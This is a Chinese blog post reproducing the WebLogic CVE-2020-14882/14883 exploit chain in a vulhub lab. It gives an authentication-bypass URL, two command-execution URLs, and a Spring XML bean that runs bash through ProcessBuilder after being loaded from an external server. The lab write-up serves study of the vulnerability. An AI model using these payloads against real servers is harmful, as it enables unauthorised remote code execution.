首页 > 其他分享 >weblogic未授权远程命令执行漏洞

weblogic未授权远程命令执行漏洞

时间:2023-01-05 23:56:48浏览次数:39  
标签:252e% Weblogic 漏洞 2020 weblogic CVE com 远程

漏洞编号 weblogic未授权漏洞:CVE-2020-14882 weblogic命令执行漏洞:CVE-2020-14883 漏洞说明 CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。 影响版本 Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。 漏洞复现 靶场环境为:vulhub weblogic CVE-2020-14882 CVE-2020-14882未授权访问链接:/console/images/%252E%252E%252Fconsole.portal images后所有标点空格都需使用url编码方式访问,浏览器会默认改编码为标点。 未授权访问的控制台 0 进入后台后,由于是低权限用户所以无法执行命令,此时需要使用CVE-2020-14883漏洞执行命令。 CVE-2020-14883有两种不同的利用方式。 一、通过com.tangosol.coherence.mvel2.sh.ShellSession (Weblogic 12.2.1以上版本利用) 二是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext。 第一种利用方式 直接访问下面的url执行命令 http://192.168.116.133:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');") 页面显示404,回到服务器端执行如下命令登录到容器中。 docker exec -it 容器id /bin/bash 这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession类。 com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext是一种更为通用的方法,最早在CVE-2019-2725被提出,对于所有Weblogic版本均有效。 首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上.。 xml文件代码如下:

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[touch /tmp/success2]]></value>
</list>
</constructor-arg>
</bean>
</beans>
然后通过如下URL,即可让Weblogic加载这个XML,并执行其中的命令:
http://192.168.116.133:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://121.4.45.196/demo.xml")

访问一下连接创建文件:

/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(“http://自己服务器地址/自己创建的xml文件”)) 成功创建  

标签:252e%,Weblogic,漏洞,2020,weblogic,CVE,com,远程
From: https://www.cnblogs.com/pursue-security/p/17029180.html

相关文章

  • weblogic T3反序列化
    漏洞编号CVE-2021-2135漏洞背景该漏洞是由Hvv中被捕捉到的,WebLogic存在一个T3协议反序列化漏洞,攻击者可利用此漏洞造成远程代码执行影响版本weblogic10.3.6.0漏洞复......
  • Tomcat文件包含及文件读取漏洞(CVE-2020-1938)
    漏洞影响CVE-2020-1938ApacheTomcat9.x<9.0.31ApacheTomcat8.x<8.5.51ApacheTomcat7.x<7.0.100ApacheTomcat6.x漏洞利用前提目标机器开启AJPConnector服务......
  • tomcat弱口令&war远程部署
    1.漏洞原理在tomcat8环境下默认进入后台的密码为tomcat/tomcat,未修改造成未授权即可进入后台,或者管理员把密码设置成弱口令,使用工具对其进行穷举。得到密码后,也可......
  • Kali搭建Vulhub漏洞复现环境
    Kali搭建Vulhub漏洞复现环境一、前言Vulhub是一个基于Docker和Docker-compose的漏洞环境集合,可以帮助我们很方便的搭建包含有各种漏洞的靶场环境,从而使得我们更加方面的......
  • git 建立远程连接
    将本地仓库和远程仓库建立连接:[email protected]/codes/code.git修改远程仓库地址gitremote-v//查看修改前的仓库gitremoteset-urlorig......
  • Linux - 配置远程开发Linux C/C++程序环境
    1.使用VS2019远程开发LinuxC/C++程序所谓工欲善其事必先利其器,开发一个项目之前,我们要选择好合适的开发工具以及开发环境。1.1LinuxC/C++程序常见的开发方式在Lin......
  • rsync远程同步
    1.rsync远程备份1-1特点能以递归的形式更新整个目录;能有选择的保留文件同步属性,比如硬链接、软链接、所有者、所属组、对应权限、修改时间等,可以保留其中的一部分属性......
  • S2-032 CVE-2016-3081 远程代码执行
    漏洞名称CVE-2016-3081S2-032远程代码执行利用条件Struts2.3.20-StrutsStruts2.3.28(2.3.20.3和2.3.24.3除外)漏洞原理当启用动态方法调用时,可以传递可用......
  • Microsoft Remote Desktop for mac(远程桌面连接工具) v10.8.0中文正式版
    mac版微软远程桌面连接工具MicrosoftRemoteDesktop哪里可以下载?MicrosoftRemoteDesktopforMac中文正式版是一款非常优秀的远程桌面连接工具,可以帮助您快速连接到基于......
  • 远程登陆
        Linux一般作为服务器使用,而服务器一般放在机房,这时我们就需要远程登录到Linux服务器来管理维护系统。Linux系统中是通过ssh服务实现的远程登录功能,默认ssh......